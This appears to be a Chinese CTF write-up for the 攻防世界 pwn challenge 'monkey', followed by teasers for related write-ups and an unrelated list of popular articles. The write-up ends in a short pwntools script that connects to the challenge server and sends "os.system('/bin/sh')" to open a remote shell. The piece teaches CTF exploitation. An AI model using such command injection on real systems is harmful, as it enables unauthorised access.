[攻防世界 pwn]——monkey

  • 题目地址:https://adworld.xctf.org.cn/
  • 题目:

额,怎么说呢这道题。checksec没什么大不了的

但是再IDA中就懵了,好大呀。好多文件。进入mian函数,也没有看很明白。准备运行程序看看到底是干什么的,帮助分析一下

输入尝试输入aaaa,发现返回的东西没有被定义。我们在Linux命令中有时命令输入错误也是这样。猜测它可能直接让输入命令。结果输入help可以,但是有的命令可以有的不可以

在IDA中查看一下字符串,因为它可以输入的字符串肯定有体现,因为输入help下面就有help的提示。

发现了file,不过它前面多了个os. 再去试试加上os.之后是否可以。发现,竟然真的可以,幸好看到了file。因为这个是Linux上面的一个命令。

其实有一个最关键的暗示,就是你按上下键你会发现,你之前输入的命令可以查看。感觉就是一个终端。

exploit

from pwn import *
p = remote('111.200.241.244',37916)
context.log_level = 'debug'
p.recv()
p.sendline("os.system('/bin/sh')")
p.interactive()

[攻防世界 pwn]——monkey相关推荐

  1. 攻防世界 Pwn 进阶 第一页

    00 要把它跟之前新手区的放在一起总结,先稍稍回顾一下新手区. 攻防世界 Pwn 新手 1.栈溢出,从简单到难,开始有后门函数,到需要自己写函数参数,到最后的ret2libc. 常见漏洞点有read( ...

  2. 攻防世界(Pwn) forgot---栈溢出;(方法二)

    攻防世界(Pwn) forgot-栈溢出:(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[ ...

  3. 攻防世界(Pwn) forgot---栈溢出;(方法一)

    攻防世界(Pwn) forgot-栈溢出:(方法二) 介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一(精确打击) 文件运行流程是: 1.先输入名字 2. 输入一串字符 ...

  4. [攻防世界 pwn]——pwn1(内涵peak小知识)

    [攻防世界 pwn]--pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇 ...

  5. [攻防世界 pwn]——实时数据监测

    [攻防世界 pwn]--实时数据监测 题目地址:https://adworld.xctf.org.cn/ 题目: checksec就不说了,没什么 ida中 只要将key里面的值修改为35795746 ...

  6. [攻防世界 pwn]——反应釜开关控制

    [攻防世界 pwn]--反应釜开关控制 题目地址:https://adworld.xctf.org.cn/ 题目: 无言以对,直接给你shell函数,返回覆盖到shell函数就OK了 exploit ...

  7. [攻防世界 pwn]——pwn-100

    [攻防世界 pwn]--pwn-100 题目地址: https://adworld.xctf.org.cn/ 题目: checksec一下 IDA中 sub_40063D函数的作用就是读入200个字符 ...

  8. [攻防世界 pwn]——pwn-200

    [攻防世界 pwn]--pwn-200 题目地址: https://adworld.xctf.org.cn/ 题目: peak小知识 ret2libc的题型, 一般给一个输出和一个输入的函数, 输入一 ...

  9. [攻防世界 pwn]——welpwn

    [攻防世界 pwn]--welpwn 题目地址: https://adworld.xctf.org.cn/ 题目: 我只能说这道题太巧了, 实在太巧了.我想出来一个名词叫做栈连接 还是先checkse ...

最新文章

  1. Google Test(GTest)使用方法和源码解析——自动调度机制分析
  2. 常用memcached命令详解
  3. 《图解CSS3:核心技术与案例实战》——1.1节什么是CSS3
  4. 二维数组m的元素是4个字符组成的串_串、数组和广义表
  5. 二年级计算机认识键盘教案,关于《认识键盘》的教学反思
  6. 打包bat等文件成exe,双击运行不显示dos窗口,exe不报毒
  7. 收藏 | 李飞飞经典CS231N《卷积神经网络视觉识别》第十一讲!
  8. OpenShift 4 之Istio-Tutorial (11) 控制Egress访问
  9. java集合迭代器_java集合迭代器
  10. 基于JAVASCRIPT操作XML的无刷新分页
  11. 数据库敏感数据加密技术
  12. 最好的磁盘管理工具Acronis Disk Director Suite 10.0英文原版 + 注册机 + 使用图文介绍
  13. 超全——一般照片、图片的尺寸、大小、像素
  14. 互联网行业哪个职业比较有前途?
  15. 【Unity】 HTFramework框架(十)Resource资源管理器
  16. 两年制大专计算机网络技术,湖南都市五年制大专_计算机网络技术专业_2021年报名...
  17. 使用WIFI通讯,手机秒变单片机大屏显示器
  18. 古典问题:有一对兔子,从出生后第3个月起每个月都生一对兔子,小兔子长到第三个月后每个月又生一对兔子,假如兔子都不死,问每个月的兔子总数为多少?
  19. 划分vlan实验心得体会_计算机网络实验心得体会_计算机网络实验工作感想
  20. 一个人的时候,学会坦然。

热门文章

  1. 泛型--定制泛型接口、泛型类--介绍篇
  2. 编写高性能Web应用程序的10个技巧
  3. 关于 MSDN 收藏夹
  4. [python爬虫] Selenium高级篇之窗口移动、弹出对话框自登录
  5. iOS之深入解析KVO的底层原理
  6. 【数据结构与算法】之深入解析“填充每个节点的下一个右侧节点指针”的求解思路与算法示例
  7. 内存(Display)、显示器(Monitor)和计算机(Computer)均属于一种产品(Product),其中计算机需要显示器和内存。请用Python语言简要实现这些类及它们之间的关系。
  8. Win10怎么设置虚拟内存?
  9. Java单层循环实现输出九九乘法表
  10. 【STM32】程序下载(ST-LINK V2)